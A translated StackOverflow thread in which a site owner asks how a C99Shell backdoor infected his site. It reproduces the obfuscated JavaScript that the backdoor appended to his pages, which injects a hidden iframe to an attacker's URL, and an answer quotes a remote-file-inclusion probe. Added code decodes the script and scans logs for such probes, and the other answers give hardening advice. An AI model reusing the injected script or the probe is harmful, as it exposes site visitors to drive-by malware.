javascript - Protect website from Backdoor/PHP.C99Shell aka Trojan.Script.224490

Note: this page is a Chinese-English parallel translation of a popular StackOverflow question, provided under the CC BY-SA 4.0 license. If you reuse it you must do so under the same license, attributing it to the original authors (not the translator) and citing the original: http://stackoverflow.com/questions/3410274/

Time: 2020-10-25 01:06:03  Source: igfitidea

Protect website from Backdoor/PHP.C99Shell aka Trojan.Script.224490

Tags: php, javascript, security, virus, trojan

Asked by caw

My website was infected by a trojan script.

Somebody managed to create/upload a file called "x76x09.php" or "config.php" into my webspace's root directory. Its size is 44287 bytes and its MD5 checksum is 8dd76fc074b717fccfa30b86956992f8. I've analyzed this file using Virustotal. These results say it's "Backdoor/PHP.C99Shell" or "Trojan.Script.224490".

This file was executed at the same moment it was created, so it must have happened automatically. This file added the following malicious code to the end of every index.php on my webspace.

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

After that code was on my page, users reported a blue panel popping up in Firefox. It asked them to install a plugin. Now some of them have Exploit.Java.CVE-2010-0886.a on their PC.

The infection did happen although I have allow_url_fopen and allow_url_include turned off. And my hoster says the file wasn't uploaded via FTP.

So my questions are:

  • What does the malicious code do? How is it encoded?
  • How could the remote file ("x76x09.php" or "config.php") come to my webspace? SQL injection? Virus on my own PC?
  • How can I protect my website from such attacks in the future?

Thank you very much in advance! I really need help.

This question is similar. But it's more like a report. I didn't know it's a virus from the beginning. So this question here refers to the virus itself, the other question does not.
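
The injected script, decoded. This is an added example written for this page, not code from the question or any of the answers; it reuses only strings that appear in the snippet above and runs under Node. Three layers are stacked: DOM method names are spelled with \xNN escapes so a grep for "iframe" or "createElement" finds nothing; the payload URL is a dot-separated hex string that the script turns into %-escapes and hands to unescape; and the result is then run through a letter-substitution function which, as the code below verifies rather than assumes, is plain ROT13. The last function in the snippet (i.i.l.j) creates a display:none element, creates an iframe whose src is the decoded URL and appends it, so every visitor silently loads that page; the shname=x76x09 parameter in the decoded URL matches the name of the dropped file. The decoded host belongs to the attacker: do not browse to it.

```javascript
// Added example: peel the three encoding layers used by the <script> block that was
// appended to the infected index.php files. Every input string below is copied from
// that snippet; nothing here contacts the network. Run with: node <thisfile>.js

// Layer 1: '\x63\x72\x65...' escapes hide DOM names from a naive grep. The JS parser
// undoes them at runtime; to read the file on disk we decode the raw source text.
function decodeHexEscapes(rawSource) {
  return rawSource.replace(/\\x([0-9a-fA-F]{2})/g, (_, hh) =>
    String.fromCharCode(parseInt(hh, 16)));
}

// Layer 2: the URL is stored as ".75.67.67.63..."; the script replaces "." with "%"
// and calls window.unescape. Same result, without relying on the deprecated unescape:
function decodeDottedHex(dotted) {
  return dotted
    .split('.')
    .filter((h) => h.length > 0)
    .map((h) => String.fromCharCode(parseInt(h, 16)))
    .join('');
}

// Layer 3: the letter-substitution function, copied verbatim (it is i.i.j.i in the
// snippet). (c & 223) upper-cases, (c & 32) restores the original case, and the
// "-52 ... % 26 ... +65" arithmetic moves every letter 13 places: ROT13.
function obfuscatedRotate(s) {
  return s.replace(/[A-Za-z]/g, function (j) {
    return String.fromCharCode((((j = j.charCodeAt(0)) & 223) - 52) % 26 + (j & 32) + 65);
  });
}

// Reference ROT13, so the claim above is checked rather than asserted.
function rot13(s) {
  return s.replace(/[A-Za-z]/g, (ch) => {
    const base = ch <= 'Z' ? 65 : 97;
    return String.fromCharCode(((ch.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// True if the snippet's rotation agrees with ROT13 on all 52 ASCII letters.
function rotateIsRot13() {
  const letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
  return obfuscatedRotate(letters) === rot13(letters);
}

// The dotted hex string exactly as it appears inside i.i.i.j in the snippet.
const DOTTED_PAYLOAD =
  '.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39';

// What the snippet does with it: i.i.l.j() builds a hidden container, creates an
// <iframe>, sets src = rotate(unescape(payload)) and appends it. This returns the
// src the victim's browser would have loaded.
function decodePayloadUrl(dotted = DOTTED_PAYLOAD) {
  return obfuscatedRotate(decodeDottedHex(dotted));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('escaped DOM name :', decodeHexEscapes('\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74'));
  console.log('rotation is ROT13:', rotateIsRot13());
  console.log('layer 2 output   :', decodeDottedHex(DOTTED_PAYLOAD));
  console.log('hidden iframe src:', decodePayloadUrl());
}
```

The same three helpers work on any other sample of this family: feed decodeHexEscapes the whole file to recover readable method names, then look for the dotted string passed to the unescape wrapper and decode it.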

Accepted answer by rook

Your website has been hacked using exploit code.

  1. You must update everything, including any PHP libraries you may have installed.

  2. Run phpsecinfo and remove all red and as much yellow as possible by modifying your .htaccess or php.ini.

  3. Remove write privileges from all files and folders in your web root (chmod 500 -R /var/www && chown www-root /var/www). The chown should be to whatever user is running PHP, so do a <?php system('whoami');?> to figure that out.

  4. Change all passwords, and use sftp or ftps if you can.

  5. Remove FILE privileges from the MySQL account that your PHP application uses.

Answer by WeWatchYourWebsite

Many of the websites we've seen that have been hacked are the result of a virus on a PC that's used to FTP files to the infected website. The virus steals the FTP password in a variety of ways - but primarily two.

First, if you're using a free FTP program like FileZilla, you should know that these programs store their saved login credentials in a plain text file. It's easy for the virus to find these, read them and send the information to a server which then logs into FTP with valid credentials, copies certain files to itself, infects them then sends them back to the website. Often times it also copies these "backdoor" shell scripts to the website as well so that when the FTP passwords are changed, they can still re-infect the site.

The virus also "sniffs" the FTP traffic. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal the information that way as well.

Quite often, however, when we've seen a backdoor that causes the infection, it's usually the result of a Remote File Inclusion vulnerability somewhere on the site. The hackers are constantly trying to add a URL that points to one of their backdoors to the end of any request string. So in your access logs you might see something like:

/path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt????

Where the path/folder string is just for demonstration purposes here.

Sometimes that command works and they are able to copy id.txt to the intended website and thus have a backdoor shell script from which they can manipulate the files.

Change all passwords - FTP, database, cPanel or other administrative interface.

Scan all PCs for viruses.

Change to SFTP.

Check all folders for 755 permissions and all files for 644. This is what is standard.

If it were SQL injection the infection wouldn't be at the end of the file. It would be somewhere there's a SQL call to generate the content.

Yes. With today's backdoors, the attacker can and probably has already viewed the config.php files where your MySQL data is saved.

Change all passwords.
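
The access-log check this answer describes, as an added example that is not part of the answer itself. It parses combined-format log lines, URL-decodes the query string (probes are frequently sent %-encoded so that a plain grep for "http://" misses them) and flags any request whose query string carries a remote URL or a PHP stream wrapper, whatever parameter it rides in. The sample lines are constructed for this example; the first one mirrors the answer's pattern and keeps www.hackerswebsite.com as the placeholder host. Among the hits, the ones that returned 200 are the ones to investigate first, because the include may have succeeded.

```javascript
// Added example: find Remote File Inclusion probes in web-server access logs.
// Works on Apache/nginx "combined" format lines; sample input is constructed.

// host ident user [time] "METHOD path HTTP/x" status bytes "referer" "agent"
const LOG_LINE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /;

// A query that carries a full URL or a PHP wrapper is an inclusion attempt no
// matter which parameter it sits in. (Expect some noise from legitimate
// ?url=... parameters; the status code and the target host sort those out.)
const REMOTE_REF = /(?:https?|ftp):\/\/|php:\/\/|data:/i;

// Decode %xx sequences; a malformed escape must not crash the scanner, so fall
// back to the raw text rather than throwing.
function safeDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (_) {
    return s;
  }
}

// True if the request path's query string references a remote resource.
function isRfiProbe(requestPath) {
  const q = requestPath.indexOf('?');
  if (q === -1) return false;
  return REMOTE_REF.test(safeDecode(requestPath.slice(q + 1)));
}

// Parses one log line; returns null for lines that do not match the format.
function parseLine(line) {
  const m = LOG_LINE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Returns the parsed entries that look like RFI probes, in log order.
function findRfiProbes(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseLine(line);
    if (entry && isRfiProbe(entry.path)) hits.push(entry);
  }
  return hits;
}

// Constructed sample log. Line 1 mirrors the answer's example; line 2 is the same
// probe %-encoded; lines 3 and 4 are normal traffic; line 5 is unparseable noise.
const SAMPLE_LOG = [
  '203.0.113.7 - - [25/Oct/2020:01:06:03 +0000] "GET /path/folder/another/folder/file.php?http://www.hackerswebsite.com/id.txt???? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [25/Oct/2020:01:06:04 +0000] "GET /index.php?page=%68%74%74%70%3a%2f%2fwww.hackerswebsite.com/id.txt%3f HTTP/1.1" 404 211 "-" "Mozilla/5.0"',
  '198.51.100.2 - - [25/Oct/2020:01:07:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 3320 "-" "Mozilla/5.0"',
  '198.51.100.2 - - [25/Oct/2020:01:07:11 +0000] "GET /redirect.php?next=/account HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  'garbage line that does not parse',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const h of findRfiProbes(SAMPLE_LOG)) {
    console.log(`${h.time} ${h.client} ${h.status} ${h.method} ${h.path}`);
  }
}
```

To run it over a real file, read the log with fs.readFileSync, split on newlines and pass the array to findRfiProbes; the remote host in each hit is where the attacker's backdoor was being served from, and the local path is the script with the inclusion bug.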

Answer by Kranu

You probably have an uploading mechanism on your website that isn't properly filtered. For example, if you have the ability to use a profile picture, somebody could upload a php file and find a way to execute it and gain control of your website.

x76x09.php is an uncensored directory browser/uploader that allows the malicious uploader to gain full control of your website.

Make sure you temporarily disable all methods of uploading files to your server immediately and delete all instances of malicious code in ALL files.